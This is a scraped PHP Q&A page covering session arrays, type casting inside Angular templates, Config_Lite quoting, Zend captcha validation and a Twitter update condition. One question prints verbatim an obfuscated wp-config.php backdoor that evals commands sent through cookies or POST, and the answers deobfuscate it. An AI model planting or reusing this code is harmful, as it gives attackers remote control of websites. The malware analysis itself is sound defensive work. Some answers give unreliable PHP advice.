Global/SESSION PHP Array/Variable without content - php

I have a huge problem which I can't seem to fix. I have 2 files: insertDB.php (for writing content into my database) and mail.php (for sending me a mail if something was written into the database). Because I don't want the mail stuff in the same file as the SQL statements, I created the mail.php file.
Now I want to pass Variables or an Array from insertDB to mail. It works in every other file I'm using but it's not working here.
<?php
//insertDB.php
Session_Start();
include 'dbconnect.php';
$login = $_SESSION['login'];
$num = $_mysqli->real_escape_string($_POST['num']);
$date = $_mysqli->real_escape_string($_POST['date']);
$user = $_mysqli->real_escape_string($_POST['user']);
$program = $_mysqli->real_escape_string($_POST['program']);
$name = $_mysqli->real_escape_string($_POST['name']);
$path = $_mysqli->real_escape_string($_POST['path']);
$mailData = [$num, $date, $user, $program, $name, $path];
$_SESSION['mailData'] = $mailData;
// var_dump($_SESSION['mailData']); <- outputs array WITH content
$insert = "INSERT INTO Zeichnungen (Num, Date, User, Program, Name, Path, Info, Leer)
VALUES ('$num', '$date', '$user', '$program', '$name', '$path', '', '$login')";
if ($_result = $_mysqli->query($insert)) {
header('Location: mail.php');
}
?>
<?php
//mail.php
Session_Start();
use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\Exception;
use PHPMailer\PHPMailer\SMTP;
include '/opt/composer/vendor/autoload.php';
include 'insertDB.php';
$login = $_SESSION['login'];
var_dump($_SESSION['mailData']);
?>
/* Output I see in Browser from mail.php -> var_dump($_SESSION['mailData']); : */
array(6) { [0]=> string(0) "" [1]=> string(0) "" [2]=> string(0) "" [3]=> string(0) "" [4]=> string(0) "" [5]=> string(0) "" }
What is the problem? Why does it have no content but the 6 keys?
Any help appreciated.

Looking at the code, there is nothing obvious to me that can cause var_dump() to print 6 empty strings. Running the provided code does not reproduce your problem (despite unnecessarily calling start_session() again, but that has no effect other than a warning).
This is difficult to debug this way. Don't use the session for this if this data does not survive through multiple requests. If you don't want to use classes, at least pass the data to functions with one responsibility. Using the session to store these variables is not a good practice. It is unnecessary global state and will eventually make this code even more difficult to follow and debug.
You have several examples in http://php.net/manual/en/functions.user-defined.php. Define the functions in one file and note that you must include that file before being able to use them. Do not mix concerns, ie: your mail function should not set HTTP headers, and your database function should not access the $_SESSION or $_POST variables.
For example, in insertIntoDb.php (less fields for clarity) and using functions:
<?php
// ... (necessary mysqli includes, etc.)
function insertIntoDB(array $formData) {
// $_mysqli is assumed to be created in global scope by the included
// connection file, so it must be imported before use inside the function.
global $_mysqli;
// we escape the data here, this escaping is DB specific.
$num = $_mysqli->real_escape_string($formData['num']);
$date = $_mysqli->real_escape_string($formData['date']);
// the login is interpolated into the same statement, so it is escaped too
$login = $_mysqli->real_escape_string($formData['login']);
$insert = "
INSERT INTO SomeTable (Num, Date, Login)
VALUES ('$num', '$date', '$login');
";
// it's better not to have other side effects here
// if everything goes right, we just continue
$result = $_mysqli->query($insert);
if (!$result) {
die("Database error");
}
}
In your mail.php file:
<?php
session_start(); // required before $_SESSION['login'] is read below
include 'insertIntoDb.php';
include 'sendEmail.php';
// we read the POST and other values here
// constructing an associative array is an
// option if not using objects.
$formData = [
'num' => $_POST['num'],
'date' => $_POST['date'],
'login' => $_SESSION['login'],
];
// using the functions
insertIntoDb($formData);
sendEmail($formData); // defined in sendEmail.php, not in example.
// this point is reached when everything works,
// no need to control flow...
header('Location: success.php'); // perhaps "thanks" message.

As many have said, the code is clean and should work. The other possible culprit is the following line:
header('Location: mail.php');
The php function header() clears all GETs & POSTs when client leaves current page.
Instead, make mail.php a function, then include mail.php in insertDB.php.
NB: Try to adopt OOP coding, particularly when dealing with PHP.

Related

How to convert String(16) to Int(1) in php

For instance
<div ng-repeat = 'list in lists'>
<?php
$user_post_id = "{{list.user.id}}"; //this syntax works
var_dump($user_post_id); // gives String(16) '1'
$user_post_int_id = (int)$user_post_id; // change from string to int
var_dump($user_post_int_id); // gives int(1) 0, I don't know why isn't type conversion working!
echo $user_post_id; // echoes out 1
echo $user_post_int_id; //echoes out the 0
So the main problem I think is of type conversion, as I tried one more thing where String(1) is converting to int(1) with no problem but with string(16) everything blows apart and results to 0.
I've got 3 suggestions for you (on my server everything works fine).
The original with my comments:
<div ng-repeat = 'list in lists'>
<?php
$user_post_id = "{{list.user.id}}"; //this syntax works
var_dump($user_post_id); // gives String(16) '1'
$user_post_int_id = (int)$user_post_id; // change to int
var_dump($user_post_int_id);
// gives int(1) 1; if not, test your PHP/server conf!
echo $user_post_id; // echoes out 1
echo $user_post_int_id; //echoes out 1
Then I advise you to try with your code, run on your server with these changes:
replace $user_post_id = "{{list.user.id}}";
to $user_post_id = (int){{list.user.id}};
// hope your PHP wouldn't show an error
replace $user_post_int_id = (int)$user_post_id;
to $user_post_int_id = floor((int)$user_post_id);
or $user_post_int_id = ceil((int)$user_post_id);
replace $user_post_id = "{{list.user.id}}";
to $user_post_id = (int)({{list.user.id}}) + 1 ;
or plus zero; these hacks sometimes work for me!
P.S. (int) can play a trick on you: PHP can think that you are using hex, bin or something else. Retest it twice!
php.net/manual/en/language.types.integer.php
php.net/manual/en/language.types.type-juggling.php
You cannot use an Angular expression inside server-side statements, as Angular expressions run on the client side after all server logic has run.
In your code:
<div ng-repeat = 'list in lists'>
<?php
$user_post_id = "{{list.user.id}}" //list.user.id is a JS variable, you cannot use it in PHP.
$user_post_int_id = (int)$user_post_id; // something wrong here, you do not need this step, normally if you retrieved the code from server side.
{{ $user_post_int_id }} //this should not work
But still this blade function fails
@if(Auth::user()->id == $user_post_int_id)
do something //returns false, makes a lot of sense, as again you are trying to get variables from JS and passing them to PHP scripts. This will never work.
@endif

Wordpress Hacked, understanding obfuscated line on wp-config.php

My friend's WordPress wp-config.php had one line of code added to it:
$ge142efa['cfea']="\x6d\x57\x36\x5f\x6b\x64\x2f\x49\x42\x7e\x4b\x45\x72\x6c\x28\x2e\x7a\x3a\x2a\x39\x37\x61\x67\x22\x73\x31\x38\x9\x48\x23\x70\x34\x7c\x30\x26\x43\x2b\x27\x78\x3d\x75\x68\x5a\x54\x4c\x51\x79\xd\x5b\x4e\x33\x50\xa\x44\x55\x32\x4a\x20\x3c\x25\x65\x69\x46\x60\x59\x4f\x21\x56\x71\x74\x53\x24\x5e\x40\x47\x2c\x6e\x5d\x5c\x3b\x4d\x58\x76\x3f\x35\x29\x7b\x7d\x52\x63\x6f\x77\x66\x6a\x62\x3e\x41\x2d";$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][94]]=$ge142efa['cfea'][89].$ge142efa['cfea'][41].$ge142efa['cfea'][12];$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]=$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][5];$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]=$ge142efa['cfea'][24].$ge142efa['cfea'][69].$ge142efa['cfea'][12].$ge142efa['cfea'][13].$ge142efa['cfea'][60].$ge142efa['cfea'][76];$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]=$ge142efa['cfea'][61].$ge142efa['cfea'][76].$ge142efa['cfea'][61].$ge142efa['cfea'][3].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][69];$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]=$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][61].$ge142efa['cfea'][21].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][16].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][16].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][50].$ge142efa['cfea'][89]]=$ge142efa['cfea'][30].$ge142efa['cfea'][41].$ge142efa['cfea'][30].$ge142efa['cfea'][82].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa[
'cfea'][24].$ge142efa['cfea'][61].$ge142efa['cfea'][90].$ge142efa['cfea'][76];$ge142efa[$ge142efa['cfea'][61].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][26].$ge142efa['cfea'][50].$ge142efa['cfea'][33].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]=$ge142efa['cfea'][40].$ge142efa['cfea'][76].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][61].$ge142efa['cfea'][21].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][16].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][92].$ge142efa['cfea'][26].$ge142efa['cfea'][20].$ge142efa['cfea'][50].$ge142efa['cfea'][2]]=$ge142efa['cfea'][94].$ge142efa['cfea'][21].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][2].$ge142efa['cfea'][31].$ge142efa['cfea'][3].$ge142efa['cfea'][5].$ge142efa['cfea'][60].$ge142efa['cfea'][89].$ge142efa['cfea'][90].$ge142efa['cfea'][5].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][89].$ge142efa['cfea'][33].$ge142efa['cfea'][84]]=$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][69].$ge142efa['cfea'][3].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][60].$ge142efa['cfea'][3].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][61].$ge142efa['cfea'][69];$ge142efa[$ge142efa['cfea'][40].$ge142efa['cfea'][31].$ge142efa['cfea'][19].$ge142efa['cfea'][25]]=$ge142efa['cfea'][61].$ge142efa['cfea'][31].$ge142efa['cfea'][2].$ge142efa['cfea'][25];$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]=$ge142efa['cfea'][22].$ge142efa['cfea'][55].$ge142efa['cfea'][94].$ge142efa['cfea'][89];$ge142efa[$ge142efa['cfea'][12].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][94].$ge142efa['cfea'][92]]=$_POST;$ge142efa[$ge142efa['cfea'][93].$ge142efa['cfea'][19].$ge
142efa['cfea'][20].$ge142efa['cfea'][84]]=$_COOKIE;#$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][12].$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][3].$ge142efa['cfea'][13].$ge142efa['cfea'][90].$ge142efa['cfea'][22],NULL);#$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][13].$ge142efa['cfea'][90].$ge142efa['cfea'][22].$ge142efa['cfea'][3].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][12].$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][24],0);#$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][0].$ge142efa['cfea'][21].$ge142efa['cfea'][38].$ge142efa['cfea'][3].$ge142efa['cfea'][60].$ge142efa['cfea'][38].$ge142efa['cfea'][60].$ge142efa['cfea'][89].$ge142efa['cfea'][40].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][90].$ge142efa['cfea'][76].$ge142efa['cfea'][3].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][60],0);#$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][89].$ge142efa['cfea'][33].$ge142efa['cfea'][84]](0);$tf027f=NULL;$w38258dd=NULL;$ge142efa[$ge142efa['cfea'][0].$ge142efa['cfea'][33].$ge142efa['cfea'][33].$ge142efa['cfea'][25].$ge142efa['cfea'][89].$ge142efa['cfea'][26].$ge142efa['cfea'][31].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]=$ge142efa['cfea'][33].$ge142efa['cfea'][31].$ge142efa['cfea'][20].$ge142efa['cfea'][92].$ge142efa['cfea'][94].$ge142efa['cfea'][84].$ge142efa['cfea'][31].$ge142efa['cfea'][94].$ge142efa['cfea'][97].$ge142efa['cfea'][26].$ge142efa
['cfea'][19].$ge142efa['cfea'][89].$ge142efa['cfea'][20].$ge142efa['cfea'][97].$ge142efa['cfea'][31].$ge142efa['cfea'][33].$ge142efa['cfea'][94].$ge142efa['cfea'][31].$ge142efa['cfea'][97].$ge142efa['cfea'][26].$ge142efa['cfea'][26].$ge142efa['cfea'][25].$ge142efa['cfea'][55].$ge142efa['cfea'][97].$ge142efa['cfea'][84].$ge142efa['cfea'][20].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][26].$ge142efa['cfea'][94].$ge142efa['cfea'][55].$ge142efa['cfea'][2].$ge142efa['cfea'][25].$ge142efa['cfea'][5].$ge142efa['cfea'][33].$ge142efa['cfea'][20];global$m001c8475;function g2bc($tf027f,$p7ec){global$ge142efa;$de211af="";for($z225cd560=0;$z225cd560<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($tf027f);){for($a7a4f09df=0;$a7a4f09df<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($p7ec)&&$z225cd560<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($tf027f);$a7a4f09df++,$z225cd560++){$de211af.=$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][94]]($ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]($tf027f[$z225cd560])^$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]($p7ec[$a7a4f09df]));}}return$de211af;}function 
i461($tf027f,$p7ec){global$ge142efa;global$m001c8475;return$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]($ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]($tf027f,$m001c8475),$p7ec);}foreach($ge142efa[$ge142efa['cfea'][93].$ge142efa['cfea'][19].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]as$p7ec=>$i61171){$tf027f=$i61171;$w38258dd=$p7ec;}if(!$tf027f){foreach($ge142efa[$ge142efa['cfea'][12].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][94].$ge142efa['cfea'][92]]as$p7ec=>$i61171){$tf027f=$i61171;$w38258dd=$p7ec;}}$tf027f=#$ge142efa[$ge142efa['cfea'][61].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][26].$ge142efa['cfea'][50].$ge142efa['cfea'][33].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]($ge142efa[$ge142efa['cfea'][40].$ge142efa['cfea'][31].$ge142efa['cfea'][19].$ge142efa['cfea'][25]]($ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][92].$ge142efa['cfea'][26].$ge142efa['cfea'][20].$ge142efa['cfea'][50].$ge142efa['cfea'][2]]($tf027f),$w38258dd));if(isset($tf027f[$ge142efa['cfea'][21].$ge142efa['cfea'][4]])&&$m001c8475==$tf027f[$ge142efa['cfea'][21].$ge142efa['cfea'][4]]){if($tf027f[$ge142efa['cfea'][21]]==$ge142efa['cfea'][61]){$z225cd560=Array($ge142efa['cfea'][30].$ge142efa['cfea'][82]=>#$ge142efa[$ge142efa['cfea'][16].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][50].$ge142efa['cfea'][89]](),$ge142efa['cfea'][24].$ge142efa['cfea'][82]=>$ge142efa['cfea'][25].$ge142efa['cfea'][15].$ge142efa['cfea'][33].$ge142efa['cfea'][97].$ge142efa['cfea'][25],);echo#$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]($z225cd560);}elseif($tf027f[$ge142ef
a['cfea'][21]]==$ge142efa['cfea'][60]){eval($tf027f[$ge142efa['cfea'][5]]);}exit();}
What does it mean?
I've tried to change eval to print, but nothing is shown.
https://eval.in/584427
By using a var_dump after the first statement with $_COOKIE I could see that the structure of the first array appears to contain several function names which are supposedly called later:
var_dump($ge142efa);
array(14) {
["cfea"]=>
[N3Pring(98) "mW6_kd/IB~KErl(.z:*97ag"s18 H#p4|0&C+'x=uhZTLQy
DU2J <%eiF`YO!VqtS$^@G,n]\;MXv?5){}Rcowfjb>A-"
["hfa2b"]=>
string(3) "chr"
["he58"]=>
string(3) "ord"
["ge19947"]=>
string(6) "strlen"
["xa2a5ede"]=>
string(7) "ini_set"
["k5051"]=>
string(9) "serialize"
["z2503c"]=>
string(10) "phpversion"
["i50830251"]=>
string(11) "unserialize"
["kf8736"]=>
string(13) "base64_decode"
["vc05"]=>
string(14) "set_time_limit"
["u491"]=>
string(4) "i461"
["v2298682"]=>
string(4) "g2bc"
["re5bf"]=>
string(6) "$_POST"
["j975"]=>
string(8) "$_COOKIE"
}
I have replaced the $_POST and $_COOKIE contents with strings as placeholders because my test environment is php -f inside a container.
The part between this array and the first function declaration boils down to this:
@ini_set('error_log', NULL); // @$ge142efa['xa2a5ede']('error_log', NULL);
@ini_set('log_errors', 0); // @$ge142efa['xa2a5ede']('log_errors', 0);
@ini_set('max_execution_time', 0); // @$ge142efa['xa2a5ede']('max_execution_time', 0);
@set_time_limit(0); // @$ge142efa['vc05'](0);
$tf027f = NULL;
$w38258dd = NULL;
$ge142efa['m001c8475'] = '047fb54b-89c7-40b4-8812-57fa8b261d07';
The first function reads thus:
function g2bc($tf027f, $p7ec){
global $ge142efa;
$de211af = "";
for($i = 0; $i < "strlen"($tf027f);){
for($j = 0; $j < "strlen"($p7ec) && $i < "strlen"($tf027f); $j++, $i++){
$de211af .= "chr"("ord"($tf027f[$i])^"ord"($p7ec[$j]));
}
}
return $de211af;
}
It appears to xor two strings and return the result.
The function below that, i461, uses it twice:
function i461($tf027f, $p7ec){
global $ge142efa;
global $m001c8475;
return "g2bc"("g2bc"($tf027f,$m001c8475),$p7ec);
}
The code below these two functions can be beautified to this:
foreach($_COOKIE as $p7ec => $i61171){
$tf027f = $i61171;
$w38258dd = $p7ec;
}
if(!$tf027f){
foreach($_POST as $p7ec => $i61171){
$tf027f = $i61171;
$w38258dd = $p7ec;
}
}
$tf027f = @"unserialize"("i461"("base64_decode"($tf027f),$w38258dd));
if(isset($tf027f["ak"]) && $m001c8475 == $tf027f["ak"]){
if($tf027f["a"] == "i"){
$z225cd560 = Array("pv" => @"phpversion"(), "sv" => "1.0-1",);
echo @"serialize"($z225cd560);
}elseif($tf027f["a"] == "e"){
eval($tf027f["d"]);
}
exit();
}
The critical part here is the eval. From my point of view this looks like code that executes something given by the right combination of $_COOKIE and/or $_POST. Basically a portion of code waiting to get the right request and execute the code specified by it.
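The same readable form can be reached statically, without executing the injected PHP. The following is an added example written for this page, not code from the original post: it folds the indexed-character lookups back into string literals and resolves the indirect calls. `SAMPLE` is a constructed miniature of the scheme, and `REVIEW`, `deobfuscate` and `findings` are names chosen here.

```python
import re

# Call names worth a reviewer's attention once recovered (illustrative list,
# drawn from the function table and the eval discussed above).
REVIEW = ("eval", "base64_decode", "unserialize", "ini_set", "set_time_limit")

# Constructed miniature of the scheme (NOT the code from the question): an
# alphabet of hex escapes, a function table built from indexed characters,
# and an indirect call through that table.
SAMPLE = r"""$q['t']="\x6f\x62\x9\x65\x36\x64\x5f\x73\x61\x34\x63";
$q[$q['t'][1].$q['t'][8]]=$q['t'][1].$q['t'][8].$q['t'][7].$q['t'][3]
 .$q['t'][4].$q['t'][9].$q['t'][6].$q['t'][5].$q['t'][3]
 .$q['t'][10].$q['t'][0].$q['t'][5].$q['t'][3];
$d=@$q[$q['t'][1].$q['t'][8]]($p);eval($d);"""


def php_unescape(body):
    """Decode PHP \\xH and \\xHH escapes; PHP accepts one OR two hex digits."""
    return re.sub(r"\\x([0-9A-Fa-f]{1,2})",
                  lambda m: chr(int(m.group(1), 16)), body)


def php_quote(text):
    """Render a recovered string as a single-quoted PHP literal."""
    return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"


def deobfuscate(src):
    """Return (readable_source, function_table) for the lookup-table scheme."""
    # 1. The alphabet statement: $var['key']="\x..\x..";
    m = re.search(
        r"\$(\w+)\['(\w+)'\]\s*=\s*\"((?:\\x[0-9A-Fa-f]{1,2})+)\"\s*;", src)
    if not m:
        return src, {}
    var, key = re.escape(m.group(1)), re.escape(m.group(2))
    alphabet = php_unescape(m.group(3))
    rest = src[:m.start()] + src[m.end():]

    # 2. Runs of $var['key'][N] joined with '.' become one string literal.
    ref = r"\$%s\['%s'\]\[(\d+)\]" % (var, key)
    run = re.compile(r"%s(?:\s*\.\s*%s)*" % (ref, ref))

    def fold(match):
        idx = [int(n) for n in re.findall(ref, match.group(0))]
        if any(i >= len(alphabet) for i in idx):
            return match.group(0)  # index outside the alphabet: leave as is
        return php_quote("".join(alphabet[i] for i in idx))

    rest = run.sub(fold, rest)

    # 3. The function table: $var['name']='callable';
    table = dict(re.findall(r"\$%s\['(\w+)'\]\s*=\s*'(\w+)'\s*;" % var, rest))

    # 4. Indirect calls $var['name'](...) become callable(...).
    def direct(call):
        name = table.get(call.group(1))
        return name + "(" if name else call.group(0)

    rest = re.sub(r"\$%s\['(\w+)'\]\s*\(" % var, direct, rest)
    return rest.strip(), table


def findings(clean):
    """Names from REVIEW that are called in the recovered source."""
    return sorted(n for n in REVIEW if re.search(r"\b%s\s*\(" % n, clean))


if __name__ == "__main__":
    clean, table = deobfuscate(SAMPLE)
    print(clean)
    print(table, findings(clean))
```

It only understands `\x` escapes and single-quoted keys, which is all this scheme uses; anything it cannot resolve is left untouched for manual review.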
I'm just dealing with the same issue. Your friend has to make some changes. Maybe the IP address was traced by some person, and he is making changes in the database that are affecting your front end and code as well.
- If you have a backup of the database, then change the database.
- Install some security plugin like All In One WP Security & Firewall.
(Because if the IP is traced again, then it may help in future.)
Some other changes:
- Search image paths in the database; they may contain malware.
- Remove unused scripts from the code.
- Change the admin panel login credentials.
- Change the cPanel credentials.

Remove double quotes when saving - pear/Config_Lite

Below is my Save Configuration file:
<?php
require_once 'Config/Lite.php';
$config = new Config_Lite();
$config->read('/var/www/html/svnmanager/Config/testing');
$config->set('/lol', 'user', 'JohnDoe')
->set('/lol', 'password', 'lemo')
->set('db2', 'user', '');
// set with ArrayAccess
$config['general'] = array('lang' => 'fr');
echo $config;
$config->save();
?>
and following is the output:
debug = ""
[db]
user = "JohnDoe"
password = "d0g1tcVs$HgIn1"
[db2]
user = ""
password = "d0g1tcVs$HgIn1"
[general]
lang = "fr"
[/lol]
user = "JohnDoe"
password = "ddada"
How do I remove the double quotes when saving the file?
for example:
[/lol]
user = JohnDoe
password = ddada
Add
$config->setQuoteStrings(false);
before saving it to the file
I'm going to start off with a rant: You are always better off using FLOSS libraries as intended/documented rather than hacking them to do what you want, if at all possible - even when the code is the only documentation available. For example, if a new version of Config_Lite comes out and you upgrade to that, you'll have "lost" your fixes.
(And, as if to prove my point, version 0.2.0 was released today at http://pear.php.net/package/Config_Lite/download/0.2.0)
To be more specific to answering your question, you need to call the setQuoteStrings method before you either explicitly save the .ini file output to a file using the write method or do anything that treats $config as a string value.
Typically, I'd do things in this order:
Create the [config] object first.
Set whatever options applicable (such as turning off quoted strings in this case)
Call whatever other methods as required (e.g. set values to sections etc)
Use resultant object (e.g. save the .ini file)
tl;dr:
$config = ....
$config->setQuoteStrings(false);
$config->set(...);
echo $config;
$config->save();
Found myself a solution. You need to change the protected $quoteStrings = true; to protected $quoteStrings = false; in your Lite.php file :)

ZendFramework - Why the results of isValid always failing?

My post data from the Captcha adapter is as follows:
["ffck"] => array(2) {
["id"] => string(32) "661db3996f5e60e71a60671496ec71a9"
["input"] => string(3) "dys"
}
My code is trying to validate now, but always failing:
Zend_Loader::loadClass('Zend_Captcha_Image');
$captcha = new Zend_Captcha_Image();
$captchaArray = array(
'id' => $post['ffck']['id'], // valid id
'input' => $post['ffck']['input'] // valid input
);
if ($captcha->isValid($captchaArray)) { // FAILs!!!!
echo "working";
} else {
echo "fails";
}
Zend_Debug::dump($post) ; // 100% valid ....
exit;
How to fix it? Or what's causing this to fail?
Check the generated html, you should only have two inputs: name="captcha[id]" and name="captcha[input]", if you have a third one with name="captcha", then you have to remove the viewhelper from the captcha element before rendering.
Ex.:
$form->getElement('captcha')->removeDecorator("viewhelper");
The array you pass to the CAPTCHA object should just contain the two keys, so try:
$captchaArray = $post['ffck'];
instead of what you are currently doing.
But the code you've posted is not valid anyway since you never generate the CAPTCHA image. I imagine you've cut down the code sample to keep the question short, so if the above fix doesn't work please edit your example to include how and where the CAPTCHA image is generated.

php if statement

I am using a Twitter class to post updates to my account. For this, I have removed my Twitter credentials, so I am aware that XXXXX is wrong. I am able to parse the text from the remote XML file. This XML file's text always reads "There are no active codes." So in my if statement I said that if the XML file reads "There are no active codes." I don't want to post anything to my Twitter, but if it changes to anything else then I would like to parse that information and post it to my Twitter. So today when there was an update to the XML file nothing happened. I know that the Twitter portion is correct because I have a similar script that does not use an if statement and it posts fine. Once I introduced the if statement I ran into the problem of not being able to post. So what can I do to post to Twitter only when the XML file changes from "There are no active codes." to anything else?
// Parse Message
$source = file_get_contents('WEBSITE_URL_GOES_HERE');
$dom = new DOMDocument();
@$dom->loadHTML($source);
$xml = simplexml_import_dom($dom);
$match = $xml->xpath("//code_message");
//Twitter class (Updating status)
require_once 'twitteroauth.php';
//Twitter credentials
define("CONSUMER_KEY", "XXXXXX");
define("CONSUMER_SECRET", "XXXXXX");
define("OAUTH_TOKEN", "XXXXXX-XXXXXX");
define("OAUTH_SECRET", "XXXXXX");
// Verify credentials
$connection = new TwitterOAuth(CONSUMER_KEY, CONSUMER_SECRET, OAUTH_TOKEN, OAUTH_SECRET);
$content = $connection->get('account/verify_credentials');
//If Statement
if ( $match[0] == "There are no active codes." ) {
/* Do Nothing */;
} else {
$connection->post('statuses/update', array('status' => 'New Code Available - ' . $match[0] ));
return $connection;
}
var_dump of the $match array:
array(1) { [0]=> object(SimpleXMLElement)#3 (1) { [0]=> string(32) "There are no active codes." } }
You should probably use a string comparison function.
like strcmp : http://php.net/manual/en/function.strcmp.php
if (strcmp((string) $match[0], "There are no active codes.") != 0)
{
$connection->post('statuses/update', array('status' => 'New Code Available - ' . $match[0] ));
return $connection;
}
Why don't you just add some debugging code and check what's going on? Echo your $match[0] and check what's in there. It's hard to imagine "if" being broken, isn't it? Maybe var_dump($match) just to check what's going on. Then you should probably either fix your condition or fix the retrieval of $match.
Check your array: the [0] element is an object, not a string. You need to get the first element of that object, if you know what I mean.
You are comparing:
Object(SimpleXMLElement)#3 (1) { [0]=> string(32) "There are no active codes." }
to
"There are no active codes."
Which is obviously not the same.
I can't test it from here, but check out the manual of SimpleXMLElement: http://php.net/manual/en/class.simplexmlelement.php
You should probably get away with a simple call. Just check out what kind of object you have. A simple example would be something like "$match[0]->childname", but I can't quickly see what the childname is. Check out the manual for some sort of getchild or something; it shouldn't be too tricky.
